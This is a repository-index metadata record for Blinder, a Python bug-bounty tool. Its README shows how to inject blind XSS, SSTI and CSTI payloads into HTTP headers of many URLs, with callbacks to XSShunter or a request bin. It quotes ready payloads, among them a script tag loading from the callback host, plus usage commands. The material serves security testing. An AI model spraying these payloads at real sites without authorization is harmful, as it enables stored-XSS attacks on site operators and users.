{"id":26940026,"url":"https://github.com/demon1a/blinder","last_synced_at":"2025-04-02T15:16:27.581Z","repository":{"id":111172376,"uuid":"306177108","full_name":"DEMON1A/Blinder","owner":"DEMON1A","description":"A script written in python3 to spread blind cross-site scripting payloads on HTTP requests headers","archived":false,"fork":false,"pushed_at":"2022-10-02T02:22:54.000Z","size":42,"stargazers_count":11,"open_issues_count":1,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-11-21T19:38:49.608Z","etag":null,"topics":["automation","blinder","bugbounty","bugbounty-tool","python3","ssti","tool","xss","xsshunter"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/DEMON1A.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-10-22T00:07:08.000Z","updated_at":"2024-10-17T02:32:44.000Z","dependencies_parsed_at":"2023-04-28T07:31:35.897Z","dependency_job_id":null,"html_url":"https://github.com/DEMON1A/Blinder","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DEMON1A%2FBlinder","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DEMON1A%2FBlinder/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DEMON1A%2FBlinder/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DEMON1A%2FBlinder/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/h
osts/GitHub/owners/DEMON1A","download_url":"https://codeload.github.com/DEMON1A/Blinder/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246837683,"owners_count":20841903,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["automation","blinder","bugbounty","bugbounty-tool","python3","ssti","tool","xss","xsshunter"],"created_at":"2025-04-02T15:16:26.763Z","updated_at":"2025-04-02T15:16:27.430Z","avatar_url":"https://github.com/DEMON1A.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Blinder\n- A script written in Python 3 to spread blind cross-site scripting payloads in HTTP request headers\n\n## Description\n- Blinder is an automation tool written in Python 3, used to spread blind payloads across HTTP servers using XSShunter or a custom requests bin, with custom payloads so you can test for more issues like SSTI, CSTI and XSS\n\n![preview](https://i.imgur.com/RugY1vS.png)\n\n### Installation\n```\ngit clone https://github.com/DEMON1A/Blinder\ncd Blinder\npython3 Blinder.py [ARGS]\n```\n\n# How To Use:\n## Basic:\n- This is Blinder's basic usage: specify your XSShunter username with the `-u` argument and the URLs file with the `-f` argument\n```\npython3 Blinder.py -u xsshunter -f urls-file.txt\n```\n\n## Redirections\n- To disallow or allow redirects in Blinder, use the `-r` option with either `deny` or `allow`\n\n```\npython3 Blinder.py -u xsshunter -f urls-file.txt -r deny\n```\n## Payloads and multi payloads.\n- In Blinder, the default 
payload we use is `\"\u003e\u003cscript src={xsshunter-url}\u003e\u003c/script\u003e`, but you can always use your own payload with the `-p` argument.\n```\npython3 Blinder.py -u hacker -f urls-file.txt -p '\"\u003e\u003cimg src=\"XXX\"\u003e'\n```\n\n- If you want to use more than one payload, separate them with the `,` character, for example: `\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e,\"\u003e\u003csvg/onload=alert(1)\u003e`. If your payload requires the `,` character and you can't separate payloads with it, use the `-s` option to choose another separator character\n\n```\npython3 Blinder.py -u xsshunter -f urls-file.txt -p '\u003cimg src=\"XXX\"\u003e,\u003ciframe src=\"XXX\"\u003e'\n```\n```\npython3 Blinder.py -u xsshunter -f urls-file.txt -p '\u003cimg src=\"XXX\"\u003e_\u003ciframe src=\"XXX\"\u003e' -s '_'\n```\n\n- By default, Blinder uses `XXX` as the string to replace with the XSShunter/requestbin URL. In case that can't be used with your payload and your payload contains `XSS` inside of it, you can always use the `--replace` argument to choose another string to be replaced\n\n```\npython3 Blinder.py -u xsshunter -f urls-file.txt -p '\u003cimg src=\"RRR\"\u003e_\u003ciframe src=\"RRR\"\u003e' -s '_' --replace 'RRR'\n```\n\n## Headers\n- By default, Blinder sends the payloads in the `User-agent` header because it's more likely to get stored by the web application in request logs and similar places. You can use a custom header in case you're testing for a known vulnerability, a CVE or anything else\n\n```bash\npython3 Blinder.py -u xsshunter -f urls-file.txt --header Header-name \n```\n\n## Requests bin\n- You can use your own requests bin, Burp Collaborator, interactsh or anything else with the `-b` argument\n\n```bash\npython3 Blinder.py -b https://request-bin.com/ -f urls-file.txt\n```\n\n### What's New?\n- Threading to improve the tool's performance.\n- Added an option that allows you to use your own requests bin instead of using XSShunter.\n- Added an option 
where you can use your own payloads instead of the default one.\n- Added an option to enable/disable redirects on requests\n- Added an option where you can use more than one payload, and choose the splitting character\n- Added an option that allows you to use your own custom headers on HTTP requests\n- Added an option that allows you to select your own replace word in the payload\n- Cleaner Code!\n\n### Issues:\n- Feel free to open an issue on the GitHub issue tracker; I usually respond to such stuff quickly\n- If you need help, you can always find me [@DemoniaSlash](https://twitter.com/DemoniaSlash)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdemon1a%2Fblinder","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdemon1a%2Fblinder","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdemon1a%2Fblinder/lists"}